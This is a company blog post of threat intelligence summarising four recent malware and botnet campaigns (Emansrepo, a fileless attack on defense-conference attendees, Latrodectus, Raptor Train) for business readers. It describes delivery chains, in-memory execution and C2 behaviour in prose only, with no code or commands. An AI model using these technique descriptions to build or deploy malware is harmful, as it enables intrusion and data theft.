October 24, 2024

Cybersecurity Threats Affecting Businesses in October 2024

Cybersecurity Services

The global cyber threat landscape remains highly elevated, with significant impacts reverberating across organizations of all sizes and sectors. Attackers persistently seek out vulnerable targets, often within industries historically underinvested in cybersecurity defenses. As these malicious actors hone their strategies, the repercussions of each attack become more severe, particularly as they set their sights on higher-value objectives.

Here are the top four threats that have emerged over the past month.

Emansrepo

FortiGuard Labs observed a Python-based infostealer named Emansrepo in August 2024. Emansrepo is spread via phishing emails containing fake purchase orders and invoices. It compresses stolen data, such as browser information and files, into a zip file and sends it to the attacker’s email. The campaign has been active since November 2023 and has evolved over time, increasing the complexity of its attack flow.

Emansrepo is distributed using multiple chains:

Chain 1 uses a dropper that mimics a download page, leading to a malicious file that downloads additional components.
Chain 2 involves an HTA file that executes a PowerShell script to download and run Emansrepo.
Chain 3 uses a batch file to execute a PowerShell script that downloads and executes Emansrepo.

The infostealer operates in three parts:

Collects login data, credit card information, and text files.
Copies PDF files and compresses browser extensions, crypto wallets, and game platform folders.
Zips and sends browser cookie files.

Additionally, there is a related campaign that uses the Remcos malware with a simpler attack flow – the attacker sends phishing emails with malicious attachments that download and execute Remcos.

The attacks by Emansrepo and Remcos highlight the need for ongoing cybersecurity vigilance as these threats continuously evolve.

Fileless Attack Targets Attendees of Upcoming US-Taiwan Defense Industry Event

Cyble Research and Intelligence Labs found a campaign targeting the upcoming US-Taiwan Defense Industry Conference. The initial vector remains unknown, but the lure document found in the campaign hints to simple spam/phishing emails. The attack chain begins with an archive containing what appears to be a PDF file but is actually a shortcut (.lnk). Once a user clicks, thinking that they are opening a PDF, the execution chain begins.

The LNK extracts a base-64-encoded .exe and an actual PDF designed to present the user with the expected outcome of clicking the .lnk (an opened PDF file). .NET’s Confuser, an obfuscation tool, is used with the .exe file to help defense evasion. The file is placed in the startup folder for persistence, and then retrieves more malicious content from a remote server. It is an XOR-encrypted DLL file (again obfuscated) which is then loaded directly into memory with .NET’s “Assembly.Load” function to avoid triggering detection by systems that usually focus on files written to the disk. After this, encrypted C# code is downloaded, and then compiled and executed entirely in memory again.

The resulting data from the code execution (various frequent data stealer targets such as passwords, cookies, CC numbers, PII, etc.) is sent back to the threat actor’s server with “application/x-www-form-urlencoded” to simulate a standard form submission mimicking a standard web browser to a specified URL. This URL links to a compromised website that the TA uses to host malicious content and retrieve the data.

This is suspected to be the work of Chinese threat actors but it has not been confirmed. Once again, however, the single linchpin of the entire campaign, despite advanced obfuscation tactics and in-memory execution, is simple social engineering. An end-user with even light training in such matters as phishing would be a much more difficult target than one without it, and able to withstand what is suspected to be a highly potent attack from a state actor for the purposes of state/industrial espionage.

Latrodectus Loader

Latrodectus, identified in early 2024 by Walmart researchers during an investigation of an IcedID campaign, is a malicious loader that shares network infrastructure, C2 traffic patterns, and DLL export addresses with IcedID. Employed by multiple threat actors in phishing-based threat campaigns, tech giants such as Proofpoint and Palo Alto Networks’ Unit 42 have confirmed that victims have received emails containing links leading to the download of Latrodectus.

The malware’s core capabilities include obtaining new C2 domains, running anti-analysis checks, downloading and executing different file types, and collecting system information. The distribution mechanism starts with emails, and observed delivery methods involve JavaScript files that either create other scripts or directly execute Latrodectus DLLs. Two threat actors, TA577 and TA578, have been identified using Latrodectus, employing tactics like thread hijacking and placing deceptive links in emails.

Latrodectus communicates with C2 servers by sending host information through POST requests, encrypted with RC4 and Base64 encoding. The RC4 key, 12345, has been reused across samples. Information sent includes request count, bot ID, OS version, system architecture, username, and campaign identifier.

The C2 server can issue commands such as clearing or setting C2s, running executables, and collecting system data. Command handlers facilitate responses to C2 instructions, including retrieving file lists, running processes, and updating the malware.

Latrodectus is a threat tool that was detected over a year ago and is still running rampant in environments today. As always, the best defense is to never click a link that you cannot confirm is safe, and if you are ever in doubt, report suspicious links and emails to your company’s IT team.

Raptor Train

Cybersecurity researchers have uncovered a massive botnet known as “Raptor Train,” believed to be operated by a Chinese nation-state group, Flax Typhoon. This sophisticated botnet has been active since at least May 2020, compromising over 200,000 small office/home office (SOHO) and Internet of Things (IoT) devices. The botnet hit a peak of 60,000 actively infected devices in June 2023. These compromised devices, which include routers, IP cameras, and network storage devices from various manufacturers, have been primarily located in the U.S., Taiwan, and Brazil. Raptor Train is notable for its large scale, making it one of the biggest Chinese state-sponsored IoT botnets ever discovered.

The botnet operates through a three-tier architecture: compromised devices (Tier 1), command-and-control (C2) servers (Tier 2), and centralized management nodes (Tier 3). Despite lacking persistence after a device reboot, the botnet quickly re-infects devices thanks to the availability of numerous exploits targeting vulnerable hardware. By mid-2024, the infrastructure behind Raptor Train had grown, with more than 60 C2 servers active between June and August 2024. These servers are responsible for managing infections, executing commands, and facilitating further exploits on compromised devices.

A significant campaign linked to Raptor Train, called “Oriole,” was active from June 2023 to September 2024, targeting devices across sectors like telecommunications, military, and higher education. By June 2024, the botnet’s C2 domain had become so prominent that it was listed in major domain rankings like Cisco Umbrella and Cloudflare Radar, giving it more reach while evading detection through domain whitelisting. Though no DDoS attacks have been confirmed, the botnet is suspected of carrying out exploitation attempts against vulnerable servers of major organizations, including Atlassian Confluence and Ivanti Connect Secure appliances.

In response, the FBI and the U.S. Department of Justice initiated a court-authorized operation in 2024 to dismantle the botnet. They successfully seized the attackers’ infrastructure and issued commands to remove the malware from thousands of infected devices. Despite attempts by the threat actors to disrupt the FBI’s operations through DDoS attacks, the law enforcement action highlighted the growing risk of botnets like Raptor Train, which allow state-sponsored groups to target global networks while concealing their activities.

If you’re facing challenges related to cybersecurity threats, breaches, and bad actors, or are interested in learning more about identifying potential threats to your organization, contact Marcum Technology today.

Hyper-Converged Infrastructure vs. Traditional IT: Which is Right for Your Company?

Hyper-converged infrastructure (HCI) or traditional IT? Discover best practices, future trends, and insights to help make the right choice for optimal performance and growth.